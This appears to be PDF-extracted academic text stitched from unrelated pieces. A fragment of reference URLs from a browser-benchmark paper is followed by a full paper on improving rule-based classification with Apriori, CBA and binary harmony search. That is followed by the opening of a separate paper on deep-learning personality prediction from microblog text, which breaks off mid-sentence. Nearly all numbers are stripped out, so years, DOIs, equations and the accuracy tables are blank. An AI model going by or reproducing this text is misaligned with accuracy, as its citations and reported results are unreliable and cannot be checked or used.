/internet-explorer- -caught-cheating-in-sunspider-benchmark/ http://digitizor.com/ / / /internet-explorer- -caught-cheating-in-sunspider-benchmark/ http://www.kevs d.co.uk/dev/canvasmark/ http://peacekeeper.futuremark.com/faq.action http://html test.com/about.html http://css test.com/ http://www.browserscope.org/security/about https://dev.opera.com/blog/ -million-users-and-move-to-webkit/ http://www.reddit.com/r/samplesize/ http://www.makeuseof.com/tag/ -awesome-google-chrome-promo-videos/ http://dx.doi.org/ . /icse. . http://dx.doi.org/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber= http://dl.acm.org/citation.cfm?id= http://dl.acm.org/citation.cfm?id= http://dx.doi.org/ . / http://www.tandfonline.com/doi/abs/ . / . . http://dx.doi.org/ . / http://www.tandfonline.com/doi/abs/ . / http://dx.doi.org/ . / . http://dx.doi.org/ . / . http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber= http://ieeexplore.ieee.org/xpls/abs_all.jsp?arnumber= http://www.sciencedirect.com/science/article/pii/s http://www.sciencedirect.com/science/article/pii/s [ ] benjamin yakir and zvi gilula. “an insightful comparison of brands on an arbitrary ordinal scale”. in: j. market research soc. . ( ), pp. – . [ ] david b yoffie and michael a cusumano. “judo strategy. the competitive dynamics of internet time.” in: harvard business review . ( ), pp. – . url: http://europepmc.org/abstract/med/ . http://europepmc.org/abstract/med/ http://europepmc.org/abstract/med/ introduction the browsers landscape browsers history browsers usage statistics research questions technical performance experimental design execution of measurements performance benchmarks results and interpretation sunspider browsermark . canvasmark peacekeeper start-up time measurement methodology and results conformance benchmarks results and interpretation html compliance css test browserscope security additional results with opera feature selection and release experimental design and methodology feature selection feature release margins feature importance survey statistical analysis procedure results early release of features importance comparisons discussion summary of results implications for software development threats to validity future work conclusions submitted december accepted march published november corresponding author ramak ghavamizadeh meibodi, r-ghavami@sbu.ac.ir academic editor sebastian ventura additional information and declarations can be found on page doi . /peerj-cs. copyright hasanpour et al. distributed under creative commons cc-by . open access improving rule-based classification using harmony search hesam hasanpour, ramak ghavamizadeh meibodi and keivan navi department of computer science and engineering, shahid beheshti university, tehran, iran abstract classification and associative rule mining are two substantial areas in data mining. some scientists attempt to integrate these two field called rule-based classifiers. rule-based classifiers can play a very important role in applications such as fraud detection, medical diagnosis, etc. numerous previous studies have shown that this type of classifier achieves a higher classification accuracy than traditional classification algorithms. however, they still suffer from a fundamental limitation. many rule-based classifiers used various greedy techniques to prune the redundant rules that lead to missing some important rules. another challenge that must be considered is related to the enormous set of mined rules that result in high processing overhead. the result of these approaches is that the final selected rules may not be the global best rules. these algorithms are not successful at exploiting search space effectively in order to select the best subset of candidate rules. we merged the apriori algorithm, harmony search, and classification- based association rules (cba) algorithm in order to build a rule-based classifier. we applied a modified version of the apriori algorithm with multiple minimum support for extracting useful rules for each class in the dataset. instead of using a large number of candidate rules, binary harmony search was utilized for selecting the best subset of rules that appropriate for building a classification model. we applied the proposed method on a seventeen benchmark dataset and compared its result with traditional association rule classification algorithms. the statistical results show that our proposed method outperformed other rule-based approaches. subjects artificial intelligence, data mining and machine learning keywords apriori algorithm, cba algorithm, harmony search introduction the availability of a huge amount of raw data has created an immense opportunity for knowledge discovery and data mining research to play an essential role in a wide range of applications such as industry, financial forecasting, weather forecasting and healthcare. classification is one of the most important areas in data mining that has applied in many applications such as bioinformatics, fraud detection, loan risk prediction, medical diagnosis, weather prediction, customer segmentation, target marketing, text classification and engineering fault detection. association rule mining (arm) is another popular and substantial technique in machine learning and data mining that introduced by agrawal, imieliński & swami ( ), and since that remained one of the most active research areas in machine learning and knowledge discovery. association rule mining finds interesting relationships among large sets of data items. association rules show attribute value how to cite this article hasanpour h, ghavamizadeh meibodi r, navi k. . improving rule-based classification using harmony search. peerj comput. sci. :e http://doi.org/ . /peerj-cs. https://peerj.com/computer-science mailto:r-ghavami@sbu.ac.ir mailto:r-ghavami@sbu.ac.ir https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://doi.org/ . /peerj-cs. conditions that occur frequently together in a given data set. association rules provide information of this type in the form of if-then statements. unlike the if-then rules of logic, association rules are intrinsically probabilistic and are computed from the data. the arm is a powerful exploratory technique with a wide range of applications including marketing policies, medical domain (ilayaraja & meyyappan, ; shin et al., ), financial forecast, credit fraud detection (sarno et al., ) and many other areas. there are a number of famous association rule mining algorithms that are accessible to researchers (agrawal, imieliński & swami, ; burdick, calimlim & gehrke, ; scheffer, a). there is some evidence that integration benefits of classification and association rule mining together can result in more accurate and efficient classification models than traditional classification algorithms (ma & liu, ). producing concise and accurate classifier by utilizing association rule mining is one of the attractive domain for data mining and machine learning researchers. a typical associative classification system is constructed in two stages: . discovering all the association rules inherent in a database. . selecting a small set of relevant association rules to construct a classifier. in the first step, some algorithms use apriori algorithm for rule generation and some other algorithms use other approaches such as foil (first order inductive learner). mazid, ali & tickle ( ) compared the performance between the rule-based classification and association rule mining algorithm based on their classification performance and computational complexity. they concluded that apriori is a better choice for rule-based mining task in terms of accuracy and computational complexity. usually a lot of rules are generated in the first step and the main issue on second step is that how to efficiently find out a small number of high-quality rules and how to generate a more accurate classifier. it must be noted that some researchers focus on the first step and try to find a minimal class association rule set (li, shen & topor, ), but our focus is on the second step. traditional algorithms use greedy approaches for selecting a small subset of generated rules for building a classifier. by using this approach, the selected rules are not the best subset of possible rules. another challenge is that the resulted rules bias to prevalent classes and classification the rare instances is a major problem. consequently, test samples belonging to the small classes are misclassified as prevalent classes (chen, hsu & hsu, ; sun, wong & kamel, ). sometimes rules with low support and very high confidence are effective in identifying rare events. in this paper, we present an association rule-based classification method to obtain an accurate and compact rule-based classifier. we used the apriori algorithm for rule generation and harmony search for selecting the best subset of rules that can build a classifier. the plan of this paper is as follows: at first, we present the necessary information related to rule-based classification. in the next section, we describe the proposed method. the results section shows the induced results and, finally, the discussion section concludes the study. hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. preliminaries apriori algorithm and interesting measures apriori is a standard and well-known basic algorithm in association rule mining that is used for mining frequent itemsets in a set of transactions. it was first introduced by agrawal and srikant (agrawal, imieliński & swami, ). the apriori-c is another apriori-based algorithm that drives rules according to the parameters minimal confidence and minimal support of a rule (jovanoski & lavrač, ). predictive apriori (scheffer, b) in another algorithm motivated by apriori and unlike the confidence related focus of apriori tries to maximizes the expected accuracy of an association rule on unseen data. while apriori sorts the rules based on confidence only, predictive apriori considers both the confidence and support in ranking the rules. nahar et al. considered three rule generation algorithms—apriori, predictive apriori and tertius- for extraction the meaningful factors for particular types of cancer (nahar et al., ) and heart disease (nahar et al., ). their experimental results showed that apriori is the most beneficial association rule mining algorithm. apriori algorithm can produce a lot of rules, but much of them are superfluous. to select appropriate rules from the set of all possible rules, constraints on various measures of interestingness can be used. support and confidence are two measures of rule interestingness that mirror the usefulness and certainty of a rule respectively (agrawal et al., ). the support is the percentage of the total number of records of transactions that include all items in the antecedent (if) and consequent (then) parts of the rule. frequent itemsets are those itemsets that their frequency is greater than a predefined minimum support (minsup). confidence is the ratio of the number of transactions that include all items in the consequent, as well as the antecedent (the support) to the number of transactions that include all items in the antecedent. in other words, confidence is the accuracy of the rule and usually is used in apriori for ranking the rules. the task of association rule mining is to generate all association rules from the set of transactions that have a support greater than minsup and confidence greater than mincon. since we need to discover the relationship between input attributes and class label, we need to find all the rules of the form a → b that antecedent part of the rule includes of some item and the consequent part can just be the class items. high support and high confidence rules are not necessarily interesting. instead of using only support and confidence, we also used lift measure as a metric for evaluating the significance and reliability of association rules. lift is the ratio of confidence to expected confidence. hence, lift is a value that gives us information about the increase in the probability of the consequent given antecedent part of a rule. a lift ratio larger than . implies that the relationship between the antecedent and the consequent is more significant than would be expected and make those rules potentially useful for predicting the consequent in unseen instances. the larger the lift ratio, the more significant the association. hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. support(x h⇒y)=p(x∩y) ( ) confidence(x h⇒y)=p(y |x)= support(x∩y ) support(x) ( ) lift(x,y)= p(x∩y ) p(x)∗p(y ) . ( ) another issue that must be considered is related to the type of dataset that is appropriate for applying the apriori algorithm. consider a dataset for supervised learning which contains observations of a class label variable and a number of predictor variables. such a dataset can be converted into an appropriate format for association rule mining if both the class label and the predictors are of the categorical type. since our benchmark datasets contain continuous variables, we must use a method for handling numeric attributes. there are some methods for this purpose. a traditional method is discretization that can be static or based on the distribution of data. we used a method proposed by tsai, lee & yang ( ). associative rules for classification in recent years, some researchers tried to combine association rule mining and classification (cano, zafra & ventura, ; li, han & pei, ; ma & liu, ; wang, zhou & he, ; wang & wong, ; yin & han, ). their experiments show that this approach achieves better accuracy than conventional classification algorithms such as c . . the reason is that the associative classifier is composed of high-quality rules, which are generated from highly confident event associations that reflect the close dependencies among events. the classification based on association rules (cba) algorithm is one of the first efforts for combining of classification and association rule mining (ma & liu, ). this algorithm will describe with details in the next section. li, han & pei ( ) suggested a weighted χ analysis to perform a classification based on multiple association rules (cmar). unlike the cba algorithm, the cmar algorithm uses all the rules that cover the example to be classified instead of using just one rule. yin & han ( ) propose the cpar (classification based on predictive association rules) rule-based classification algorithm cpar doesn’t generate a large number of candidate rules as in conventional associative classification. it pursues a greedy algorithm to produce rules directly from training data and uses the best k rules in prediction time. an advantage of associative classifiers is that they are rule-based and thus lend themselves to be more easily understood by humans. as previously stated, a classification system is built in two phase. in the first stage, the learning target is to discover the association patterns inherent in a database (also referred to as knowledge discovery). in the second stage, the goal is to select a small set of relevant association patterns to construct a classifier given the predictor attributes. to produce the best classifier out of the entire set of rules, we need to consider all the feasible subsets of rules and selecting the most accurate subset. this is clearly impractical. hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. in the classification phase, some methods such as (ma & liu, ; thabtah, cowling & peng, ; wang, zhou & he, ), simply select a rule with a maximal user-defined measure, such as confidence. if there is no rule covering the example, then usually the prevalent class is taken to be the predicted class. however, identifying the most effective rule at classifying a new case is a big challenge. when classifying a new data object, it may have more rules that satisfy the test conditions and using them may increase the prediction accurately (li, han & pei, ). cba algorithm classification based on associations (cba) algorithm is one of the first algorithms to bring up the idea of classification using association rules (ma & liu, ). cba implements the famous apriori algorithm (agrawal, imieliński & swami, ) in order to discover frequent items. once the discovery of frequent items finished, cba proceeds by converting any frequent item that passes the minconf into a rule in the classifier. at the rule generation phase, cba selects a special subset of association rules whose right-hand-side are restricted to the classification class attribute. this subset of rules is called class association rules (cars). at the next step, the cba algorithm builds a classifier using cars. at this step, cba uses a heuristic approach and sorts the rules according to their confidence and selects top rules that cover the training samples. the algorithm first selects the best rule (rule having the highest confidence), then eliminates all the covered examples. if at least one example satisfied the rule conditions, then that rule is appended to the final rules. this procedure is repeated until there are no more rules to select or there are no more examples to cover. the algorithm then stops and returns the classifier in the form of an if-then-else rule list. one challenge with this approach is that selecting the best rules may be not the best subset of rules. the cba system follows the original association rule model and uses a single minsup in its rule generation. it seems that this is inadequate for mining of cars because class frequency distributions in many practical classification datasets is unbalanced. we used the cba algorithm with three little changes. the first change is that we use multiple minsup than can be useful for imbalanced datasets. the second change is that in the original cba algorithm once each sample is covered by a rule, it is removed from the samples; we defined a parameter called delta. this parameter defined that how many times each sample must be covered to remove from the samples (li, han & pei, ). this approach leads to the generation of more rules. the third change occurs in the classification phase. in the classification phase of the original cba algorithm, the rule with maximum confidence that covers the test conditions defines the class label of a test sample. we select the top k (a predefined parameter) rules from each class that covers the test sample conditions and determined the class label according to the sum of the confidence of selected rules. all data preprocessing and analyse were conducted using matlab version a (the mathworks inc., natick, ma, usa). proposed method the proposed method of rule selection based on hs are depicted in fig. . at the initial step, we did some preprocessing on each dataset. one of the main preprocessing is discretization hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. training data discretization convert to appropriate format apply apriori algorithm harmony search classification using selected rules test data apply cba algorithm figure the framework of the proposed method. this figure shows what steps must be done for imple- mentation of the proposed method. full-size doi: . /peerjcs. /fig- of continuous features. we applied a discretization algorithm based on a class-attribute contingency coefficient that was proposed by tsai, lee & yang, ( ). after discretization, we convert each dataset to the appropriate format such that the value of each feature can be true ( ) or false ( ). for this aim, if a feature is converted to n different discrete values, we produce n feature. after the conditions are satisfied for the apriori algorithm, we run this algorithm for each class with different minsup and minconf. the main novelty of our study is in the next step. as previously was mentioned, the apriori algorithm produces many rules and cba algorithm uses a greedy algorithm for selecting a subset of produced hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. rules for building a classifier. using greedy approaches cause the selected rules to not be the best subset of rules. we believe that population-based evolutionary algorithms fit well to the rule selection problem. harmony search (hs) is a population-based stochastic search algorithm that inspired by the musical process of searching for a perfect state of harmony (geem, kim & loganathan, ). the harmony in music is analogous to the optimization solution vector, and the musician’s improvisations are similar to local and global search methods in optimization techniques when a musician is improvising, he has three choices: ( ) to execute any pitch from memory; ( ) to execute a pitch next to any other in his memory; ( ) to execute a random pitch from the range of all possible pitches. these three options are employed in the hs algorithm by means of three main parameters: harmony memory (hm), harmony memory consideration rate (hmcr), and pitch adjustment rate (par). the hmcr is defined as the probability of selecting a component from the present hm members. the par determines the probability of a candidate from the hm to be mutated. the steps in the procedure of hs are as follows: step . initialize a harmony memory (hm). the initial hm consists of a given number of randomly generated solutions to the optimization problems under consideration. step . improvise a new harmony from hm. step . update the hm. if the new harmony is better than the worst harmony in hm, then include the new harmony in the hm and exclude the worst harmony from the hm. step . if the stopping criteria we not satisfied, go to step . hs has been successfully applied to various discrete optimization problems such as maximum clique problem (afkhami, ma & soleimani, ), traveling salesperson problem (geem, kim & loganathan, ), tour routing (geem, tseng & park, ), water network design (geem, ), dynamic relocation of mobile base stations in wireless sensor networks (moh’d alia, ), and others. in binary hs, the size of each solution equals the number of candidate’s rules. for example, if the apriori algorithm produces rules that satisfy minsup and minconf conditions then the size of each solution in hs will be equal to . each solution consists of a binary vector of rule incidences, indicating exclusion ( ) or inclusion ( ) of the rule in the combination. the standard harmony search (hs) is not suitable for binary representations. this is due to the pitch adjusting operator not being able to perform the local search in the binary space. therefore we used the implementation of hs that proposed by afkhami, ma & soleimani ( ). we run the hs algorithm with the following parameters: maximum number of iterations = , harmony memory size = , number of new harmonies = , harmony memory consideration rate = . . we used harmony search, a music-inspired stochastic search algorithm, for selecting the best subset of rules as a classifier. one of the important section in any meta-heuristic algorithm is the calculation of cost function. for this aim, we apply a modified version of the cba algorithm on the selected rules and calculate the error rate of applying the resulted rules on the training and validation data. at final, the solution with the minimum hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table pseudo code of the proposed method. this pseudo code supposes that we have training input, training output, test input, validation input and validation output. the code shows that how we build a rule-based classifier and determine the test data output. for i= to k fold determine traininput, trainoutput, testinput, testoutput, valinput and valoutput finalrules={}; for j= to number_class rulesj= apply apriori algorithm(traininput, minsupj,minconj,class j ) finalrules= append rulesj to finalrules end %for j selected_rules=apply harmony search algorithm (finalrules, traininput, trtainoutput, valinput, valoutput) testoutput= apply selected_rules on testinput end %for i cost value is selected and this solution (a subset of rules) applies on the test data. it is obvious that the proposed flowchart is shown for one fold of cross-validation. in k-fold cross-validation, this approach must be repeated for k times, until all the samples in the dataset are used for the test data. the pseudo code of the proposed method is shown in table . time complexity of the apriori algorithm and association rule mining is a critical challenge that must be considered (cano, luna & ventura, ; cano, zafra & ventura, ; luna et al., ; thabtah, cowling & hammoud, ). as its time complexity is exponential, we can do some preprocessing activity to decrease the running time. first of all, we can apply feature selection before applying apriori algorithm. feature selection can be done before or after of discretization. the second thing that we can do is related to the size of the rules. as small rules are favorable, we can limit the size of items that appear in a rule and consequently decrease the running time of apriori algorithm. results we applied the proposed method on seventeen benchmark dataset and compare its result with traditional association rule classification algorithms. we compared our proposed method with the cpar, cba and c . algorithms that are famous in rule-based classification (ma & liu, ; quinlan, ; yin & han, ) the characteristic of the used datasets are shown in table . we selected datasets with a verity of size in samples, attributes and number of classes. to run the experiments, a stratified five-fold cross-validation was used to produce a reliable accuracy. cross-validation is a standard evaluation measure for calculating error rate on data in machine learning. at each run, we split each dataset to five parts, three part for training, one part for validation and one part for testing. to increase reliability, the experiments for each dataset have been repeated times and the average of results were reported. hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table description of used datasets. each row shows the specifications of a used dataset including the name of the dataset, the number of features, the number of classes and distribution of classes. id dataset # of data items # of features # of class distribution iris – – galaxy – – – – – – wine – – tictactoe – saheart – car , , – – – breast cancer – yeast , – – – – – – – – – balance scale – – lymphography – – – haberman – mammographic – phoneme , , – , pima – german , – monks- – monks- – the result of the proposed method is shown in table . as the results show, at four dataset decision tree gain the best accuracy, cpar algorithm have the highest accuracy at the five datasets and our proposed method is the best at the seven datasets out of nine datasets. in one dataset, all algorithms are perfect and gain equal accuracy. the cba algorithm is not the best in none of the datasets and in all of the datasets our proposed method outperformed the cba algorithm. it must be noted that the results of decision tree, cba and cpar algorithms are reproduced on the same partitions. we used the friedman test (friedman, ) as an appropriate choice for comparing multiple classification algorithms (brazdil & soares, ; demšar, ). the friedman test is a non-parametric statistical test developed by milton friedman (friedman, ; friedman, ). similar to the parametric repeated measures anova, it is used to detect differences between groups when the dependent variable being measured is ordinal. it must be noted that classification algorithms are ranked on each of the datasets and then the friedman test is applied. the last row of table shows the mean rank for each of the algorithms. as the results show, proposed method gained the best position and cba has the worst one. the results also shows that there is an overall statistically significant difference between the mean ranks of the related algorithms (p = . ). the reported accuracy of other studies may be different in some algorithms from our ones. one of the main reason for this conflict is that we had no information about the hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. table experiment results based on repetitions of -fold cross validation. each row of the table shows the accuracy of applying four rule-based classification algorithm on a dataset. id dataset decision tree cba cpar proposed method iris . . . . galaxy . . . . wine . . . . tictactoe . . . . saheart . . . . car . . . . breast cancer . . . . yeast . . . . balance scale . . . . lymphography . . . . haberman . . mammographic . . . . phoneme . . . . pima . . . german . . . monks . . . . monk mean rank . . . . discretization algorithm, in particularly the number of ranges used to discretize continuous attributes. using different discretization approaches can result in different outputs. discussion this research has focused on the application of computational intelligence in association rule mining-based classifiers. although rule-based classification algorithms have high classification accuracy, but some of them suffer from a critical limitation. they used a heuristic approach for selection a subset of rules for building a classifier. it is obvious that the selected rules may not be the best subset of possible rules. another challenge of existing algorithms is related to rare class. using greedy approaches, the resulted rules bias to prevalent classes and classification the rare instances is a major problem. we combined the apriori, cba and harmony search algorithms in order to build a rule-based classifier that has a high prediction accuracy. we used apriori algorithm with multiple minsup for rule generation. since the number of rules that satisfy minsup and minconf conditions is high and considering all subset of rules is not possible, we applied the harmony search algorithm for finding the best subset of rules that can be used as a classifier. harmony search (hs) is a relatively simple yet very efficient evolutionary algorithm. one of the main sections in every population based algorithms is calculating the cost function. for every solution (subset of selected rules) we applied a modified version of the cba algorithm on training and validation data and assigned the resulted value to the cost function. the statistical and experimental results of applying the proposed method hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. on seventeen benchmark dataset demonstrate that our proposed method outperformed famous algorithms such as tree search, cba and cpar in general. one of the limitations of the proposed method is that it does not gain proper accuracy in datasets with many class number. another limitation in our study is that we used accuracy measure for comparing the algorithms. using measures such as precision and recall better reflects the benefits of the proposed method. our aim in the future is to tackle these problems. additional information and declarations funding the authors received no funding for this work. competing interests the authors declare there are no competing interests. author contributions • hesam hasanpour conceived and designed the experiments, performed the experiments, analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • ramak ghavamizadeh meibodi authored or reviewed drafts of the paper, approved the final draft. • keivan navi authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: this work uses standard benchmark datasets that can be downloaded from the following addresses: https://sci s.ugr.es/keel/datasets.php; https://archive.ics.uci.edu/ml/index.php. the matlab code is available as a supplemental file. supplemental information supplemental information for this article can be found online at http://dx.doi.org/ . / peerj-cs. #supplemental-information. references afkhami s, ma or, soleimani a. . a binary harmony search algorithm for solving the maximum clique problem. international journal of computer applications ( ): – . agrawal r, imieliński t, swami a. . mining association rules between sets of items in large databases. in: proceedings of the acm sigmod international conference on management of data, washington dc, - may . new york: acm, – doi . / . . hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://sci s.ugr.es/keel/datasets.php https://archive.ics.uci.edu/ml/index.php http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . /peerj-cs. #supplemental-information http://dx.doi.org/ . / . http://dx.doi.org/ . /peerj-cs. agrawal r, mannila h, srikant r, toivonen h, verkamo ai. . fast discovery of association rules. advances in knowledge discovery and data mining : – . brazdil pb, soares c. . a comparison of ranking methods for classification algo- rithm selection. in: european conference on machine learning. springer, – . burdick d, calimlim m, gehrke j. . mafia: a maximal frequent itemset algorithm for transactional databases. in: proceedings of the th international conference on data engineering, . piscataway: ieee, – . cano a, luna jm, ventura s. . high performance evaluation of evolutionary- mined association rules on gpus. the journal of supercomputing : – doi . /s - - - . cano a, zafra a, ventura s. . an interpretable classification rule mining algorithm. information sciences : – doi . /j.ins. . . . cano a, zafra a, ventura s. . parallel evaluation of pittsburgh rule-based classifiers on gpus. neurocomputing : – doi . /j.neucom. . . . chen w-c, hsu c-c, hsu j-n. . adjusting and generalizing cba algorithm to handling class imbalance. expert systems with applications : – doi . /j.eswa. . . . demšar j. . statistical comparisons of classifiers over multiple data sets. journal of machine learning research : – . friedman m. . the use of ranks to avoid the assumption of normality implicit in the analysis of variance. journal of the american statistical association : – doi . / . . . friedman m. . a comparison of alternative tests of significance for the problem of m rankings. the annals of mathematical statistics : – doi . /aoms/ . geem zw. . optimal cost design of water distribution networks using harmony search. engineering optimization : – doi . / . geem zw, kim jh, loganathan gv. . a new heuristic optimization algorithm: harmony search. simulation : – doi . / . geem zw, tseng c-l, park y. . harmony search for generalized orienteering problem: best touring in china. in: international conference on natural computation. springer, – . ilayaraja m, meyyappan t. . mining medical data to identify frequent diseases using apriori algorithm. in: pattern recognition, informatics and mobile engineering (prime), international conference on. piscataway: ieee, – . jovanoski v, lavrač n. . classification rule learning with apriori-c. in: portuguese conference on artificial intelligence. springer, – . li w, han j, pei j. . cmar: accurate and efficient classification based on multiple class-association rules. in: data mining, icdm , proceedings ieee interna- tional conference on. piscataway: ieee, – . li j, shen h, topor r. . mining the optimal class association rule set. knowledge- based systems : – doi . /s - ( ) - . hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /s - - - http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /j.neucom. . . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . / . . http://dx.doi.org/ . /aoms/ http://dx.doi.org/ . / http://dx.doi.org/ . / http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /peerj-cs. luna jm, cano a, pechenizkiy m, ventura s. . speeding-up association rule mining with inverted index compression. ieee transactions on cybernetics : – doi . /tcyb. . . ma blwhy, liu b. . integrating classification and association rule mining. in: proceedings of the fourth international conference on knowledge discovery and data mining. mazid mm, ali as, tickle ks. . a comparison between rule based and association rule mining algorithms. in: network and system security, nss’ third interna- tional conference on. piscataway: ieee, – . moh’d alia o. . dynamic relocation of mobile base station in wireless sensor networks using a cluster-based harmony search algorithm. information sciences : – . nahar j, imam t, tickle ks, chen y-pp. . association rule mining to detect factors which contribute to heart disease in males and females. expert systems with applications : – doi . /j.eswa. . . . nahar j, tickle ks, ali as, chen y-pp. . significant cancer prevention factor extraction: an association rule discovery approach. journal of medical systems : – doi . /s - - - . quinlan jr. . c . : programs for machine learning. burlington: morgan kauffman. sarno r, dewandono rd, ahmad t, naufal mf, sinaga f. . hybrid association rule learning and process mining for fraud detection. international journal of computer science ( ): – . scheffer t. a. finding association rules that trade support optimally against confi- dence. in: european conference on principles of data mining and knowledge discovery. springer, berlin, heidelberg, – . scheffer t. b. finding association rules that trade support optimally against confidence. principles of data mining and knowledge discovery – doi . / - - - _ . shin am, lee ih, lee gh, park hj, park hs, yoon ki, lee jj, kim yn. . diagnostic analysis of patients with essential hypertension using association rule mining. healthcare informatics research : – doi . /hir. . . . . sun y, wong ak, kamel ms. . classification of imbalanced data: a review. in- ternational journal of pattern recognition and artificial intelligence : – doi . /s . thabtah f, cowling p, hammoud s. . improving rule sorting, predictive accuracy and training time in associative classification. expert systems with applications : – doi . /j.eswa. . . . thabtah fa, cowling p, peng y. . mmac: a new multi-class, multi-label associative classification approach. in: data mining, icdm’ fourth ieee international conference on. piscataway: ieee, – . tsai c-j, lee c-i, yang w-p. . a discretization algorithm based on class-attribute contingency coefficient. information sciences : – doi . /j.ins. . . . hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tcyb. . http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /s - - - http://dx.doi.org/ . / - - - _ http://dx.doi.org/ . /hir. . . . http://dx.doi.org/ . /s http://dx.doi.org/ . /j.eswa. . . http://dx.doi.org/ . /j.ins. . . http://dx.doi.org/ . /peerj-cs. wang y, wong akc. . from association to classification: inference using weight of evidence. ieee transactions on knowledge and data engineering : – doi . /tkde. . . wang k, zhou s, he y. . growing decision trees on support-less association rules. in: proceedings of the sixth acm sigkdd international conference on knowledge discovery and data mining. new york: acm, – . yin x, han j. . cpar: classification based on predictive association rules. in: proceedings of the siam international conference on data mining. philadelphia: siam, – . hasanpour et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /tkde. . http://dx.doi.org/ . /peerj-cs. submitted march accepted august published september corresponding authors xiaoqian liu, liuxiao- qian@psych.ac.cn tingshao zhu, tszhu@psych.ac.cn academic editor jinde cao additional information and declarations can be found on page doi . /peerj-cs. copyright liu and zhu distributed under creative commons cc-by . open access deep learning for constructing microblog behavior representation to identify social media user’s personality xiaoqian liu and tingshao zhu institute of psychology, chinese academy of sciences, beijing, china abstract due to the rapid development of information technology, the internet has gradually become a part of everyday life. people would like to communicate with friends to share their opinions on social networks. the diverse behavior on socials networks is an ideal reflection of users’ personality traits. existing behavior analysis methods for personality prediction mostly extract behavior attributes with heuristic analysis. although they work fairly well, they are hard to extend and maintain. in this paper, we utilize a deep learning algorithm to build a feature learning model for personality prediction, which could perform an unsupervised extraction of the linguistic representation feature vector (lrfv) activity without supervision from text actively published on the sina microblog. compared with other feature extractsion methods, lrfv, as an abstract representation of microblog content, could describe a user’s semantic information more objectively and comprehensively. in the experiments, the personality prediction model is built using a linear regression algorithm, and different attributes obtained through different feature extraction methods are taken as input of the prediction model, respectively. the results show that lrfv performs better in microblog behavior descriptions, and improves the performance of the personality prediction model. subjects artificial intelligence, natural language and speech, social computing keywords personality prediction, social media behavior, deep learning, feature learning introduction personality can be defined as a set of traits in behaviour, cognition and emotion which is distinctive among people (mischel, shoda & ayduk, ). in recent years, researchers have formed a consensus on personality structure, and proposed the big five factor model (costa & mccrae, ), which uses five broad domains or factors to describe the human personality, including openness (o), conscientiousness (c), extraversion (e), agreeableness (a) and neuroticism (n) (funder, ). traditionally, questionnaires have been widely used for personality assessment, especially the big five personality questionnaire. but the form of questionnaire may be inefficient on large population. due to the rapid development of information technology, the internet has become part of everyday life. people prefer expressing their thoughts and interacting with friends on social network platforms. therefore, researchers pay more and more attention to figuring out the correlation between the behavior of users on social networks and their personality traits in order to realize automatic personality prediction by machine learning methods. how to cite this article liu and zhu ( ), deep learning for constructing microblog behavior representation to identify social media user’s personality. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:liuxiaoqian@psych.ac.cn mailto:liuxiaoqian@psych.ac.cn mailto:tszhu@psych.ac.cn https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. nowadays, the internet is not used just for communication, but also as a platform for users to express their thoughts, ideas and feelings. personality is indirectly expressed by users’ behavior on the social network, which refers to a variety of operations on the social network, such as comment, follow and like. in addition, text, punctuation and emoticons published by users can be regarded as one kind of social behavior. therefore, for automatic personality prediction, how to abstract these diverse and complex behaviors and acquire the digital representation of social network behaviors has become an critic problem. existing behavior analysis methods are mostly based on some statistics rules, but artificial means have some disadvantages in objectivity and integrity. generally, attributes are especially important for the performance of a prediction model. a set of proper feature vectors could improve the effectiveness of prediction model to a certain extent. therefore, it is required that the attributes are not only the comprehensive and abstract description of individual’s behavior characteristic, but also reflect the diversity of different individuals’ behaviors. in this paper, we use a deep learning algorithm to perform an unsupervised extraction lrfv from users’ content published on the sina microblog. compared with other attributes obtained by artificially means, lrfv could represent users’ linguistic behavior more objectively and comprehensively. there are two reasons of utilizing deep learning algorithm to investigate the correlation between users’ linguistic behavior on social media and their personality traits. one is that deep learning algorithm could extract high-level abstract representation of data layer by layer by exploiting arithmetical operation and the architecture of model. it has been successfully applied in computer vision, object recognition and other research regions. another is that the scale of social network data is huge, and the deep learning algorithm can meet the computational demands of big data. given all this, in this article we have done a preliminary study on constructing microblog linguistic representation for personality prediction based on the deep 